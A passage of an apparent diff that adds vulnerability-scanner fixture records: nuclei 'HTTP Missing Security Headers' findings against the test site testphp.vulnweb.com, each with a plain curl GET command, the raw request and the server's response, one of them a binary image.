"http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:07.465Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 825, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:42:07.652Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 826, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:07.842Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 827, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:08.032Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 828, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:42:08.220Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 829, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:42:08.403Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 830, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:42:08.602Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 831, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:42:08.795Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 832, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:42:08.987Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 833, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": 